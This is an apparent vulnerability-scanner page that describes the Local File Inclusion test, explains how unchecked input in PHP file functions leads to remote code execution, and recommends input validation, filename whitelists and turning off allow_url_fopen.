Test Methods ( Detailed Overview )

Here is a list of every test performed by Web Scan Service.

Local File Inclusion

Remediation Task

Validate users input

WASC Classification

Logical Attacks: Abuse of Functionality

Affected Products

This issue may affect different types of products

Technical Description

Malicious remote/local file execution vulnerabilities are found in many applications. Developers will often directly use or concatenate potentially hostile input with file or stream functions, or improperly trust input files.

On many platforms, frameworks allow the use of external object references, such as URLs or file system references. When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server.

This allows attackers to perform:

Remote code execution
Remote root kit installation and complete system compromise
On Windows, internal system compromise may be possible through the use of PHP’s SMB file wrappers This attack is particularly prevalent on PHP, and extreme care must be taken with any stream or file function to ensure that user supplied input does not influence file names.

Fix Recommendation

[1] Validate and sanitize user input used in vulnerable functions (file operations, include/require and eval() statements). Where applicable, use a white list of allowed filenames for inclusion. [2] Try to limit the use of dynamic inputs in vulnerable functions. [3] Unless required, disable allow_url_fopen in php.ini (PHP's configuration file). In php.ini, replace "allow_url_fopen = on" with "allow_url_fopen = off".

This website has been certified with Web Scan Service